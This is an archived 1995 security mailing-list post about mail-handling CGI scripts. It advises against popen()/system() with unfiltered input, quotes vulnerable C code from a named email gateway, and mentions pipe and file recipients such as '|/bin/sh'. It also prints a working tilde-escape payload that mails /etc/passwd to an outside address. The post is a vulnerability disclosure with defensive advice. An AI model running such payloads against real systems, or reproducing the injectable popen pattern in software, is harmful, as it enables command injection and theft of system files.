In message <199508042344.QAA20408@Csli.Stanford.EDU> Christian Wettergren write s >| Just to be helpful, the way to do it more safely, without massive >| need for checking is to build a complete mail message, including >| header, and hand that to "sendmail -t" which then reads the recipient >| information out of the constructed header. [Sendmail should of course >| be an invocation of smail or pp, not the BSD program of that name, >| given the history of problems that has had] > >I suspect this still wont take care of emails to pipes or files, >i.e <|/bin/sh> or </.rhosts>, it is a legitimate, albeit unexpected, >mail-command going to sendmail. So unless these two mode are totally >stripped out of the sendmail, there will exist a vulnerability there, >wont it? I've written an email-cgi package myself, and for this package I've used a simple smtp client written by Wietse Venema. I've been familiar with bugs like tilde-escapes etc. for a while, and this smtp client does not have any fancy switches, escapes, options etc. Ok, of course you should not use popen() or system() (C) or open/syste, (perl) (at least not withouth filtering out '|;' etc), but fork combined with execve works fine and secure. You can find smtp.c in the wwwutils package at ftp://ftp.win.tue.nl/pub/infosystems/www/wwwutils.tar.gz or directly at ftp://ftp.nijenrode.nl/pub/people/ivo/smtp.c Also (perhaps someone already reported this), Thomas Boutell's Email Handler (http://siva.cshl.org/email/index.htm) seems to suffer from this problem. I've reported this a very long time ago to him, but it seems he hasn't fixed it. Thomas Boutell is maintainer of the WWW-FAQ, and he refers to his handler in it, so it *might* be that a lot of people are using it! Here's a piece of code from email.c: sprintf(buf, "/usr/bin/mail %s", entries[recipientid].val); out = popen(buf, "w"); fprintf(out, "Subject: %s\n", entries[subjectid].val); fprintf(out, "Reply-To: %s\n", entries[emailid].val); fprintf(out, "Supposedly-From: %s\n", entries[nameid].val); fprintf(out, "[This message was sent through the www-email gateway.]\n"); fprintf(out, "--\n"); fprintf(out, "%s\n", entries[contentid].val); pclose(out); The popen() here doesn't seem to be insecure, the cgi first checks the recipient against a list of users which are defined in a local configfile (which location is hardcoded into the source). However, this program directly sends the entire message to /usr/bin/mail, including ~-escapes. I've been able to send myself, using this program, a copy of the passwd file by simply typing ~!/bin/mail ivo@nijenrode.nl < /etc/passwd in the message-entry of the form. This was on AIX 2.3. Happy hacking, Ivo ------------------------------------------------------------------------ Name: Ivo van der Wijk | It won't give up it wants me dead Internet: ivo@nijenrode.nl | this goddamn noise inside my head Aka: www@nijenrode.nl | IRC: VladDrac | |\|||/| URL: http://www.nijenrode.nl/~ivo ------------------------------------------------------------------------